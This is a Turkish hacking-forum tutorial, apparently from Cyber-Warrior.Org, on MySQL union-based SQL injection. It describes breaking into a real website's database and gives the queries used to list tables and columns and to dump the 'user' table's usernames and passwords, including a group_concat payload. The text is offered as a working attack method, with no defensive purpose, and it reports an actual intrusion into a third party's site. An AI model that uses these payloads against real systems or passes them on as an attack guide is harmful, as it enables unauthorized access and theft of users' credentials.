Selamun aleykum arkadaslar ;

MySQL Injection u Bu Kez Sadece Kodlarla Degilde, Görsel Olarak  Anlatmaya Çalistim, Mantigi Kavramak Için Yararli Olacagini Düsünüyorum...Database ye SQL Kasarken Girdim 

Iste Versiyon 4 Database



tabloda Kirmizi  ile Belirttigim yer bizim su kodla aldigimiz;

union  select  table_name  from  information_schema.tables

Tablo Adlarimiz tablo isimlerimiz...

# Article
# Article Stock
#Article Text
# Category
# Transaction
# Firma
# News
# News_Preview
# Projekt
# user

Evet Tablolarimiz bunlar...

Eger admin Login bilgilerini almak istiyorsaniz Malum Tablo adi user

User Tablomuzun açilmis görüntüsü...

Evet Kirmizi kutu içerisinde belirttigim yerler kolon isimleri. Yani Biz bunu normal injectionda kod halinde söyle aliyoruz...

union select column_name from information_schema.columns where table_name=’user’

Görüntüde gördügümüz Kolon isimlerimiz...

# id
# Username
# Password
# Nachname
# Vorname
# email
# status
# datum

Malum Kolonlarimiz  Username  ve  Password

Username  ve  Password   Kolonlarinin açilmis Hali ;

Gördügünüz Gibi Username Password Email Gibi Malum Kolonlarin Içindeki Bilgiler Ortaya Çikti

Biz Bunu Normal Injectionda Su kodla aliriz...

username için ;

union select username from user

Password için ;

union select  Password from user

Eger Ikisini Ayni anda almak Istersek;

union select group_concat(username,0x3a,password) from user

Son Olarak Sitedeki Hali Sudur Arkadaslar

Gördügünüz Gibi Yukaridaki Databasedeki Hersey Injection ile de Ekrana Vurdu

Arkadaslar Bildiginiz Gibi Veriyon 4  Access e benzer Tahmin Isidir.
Sizlere Tablo adlarini ve kolon adlarini  Ijection ilede göstermek isterdim ama malum vs.4

Eger Versiyon 5  Database ine girebilirsem onuda  konunu  devamina eklemeyi isterim...

Dökümanim bu kadar insAllah yararli Olacaktir...

 Cyber-Warrior.Org / CWZoRBeY

 Selametle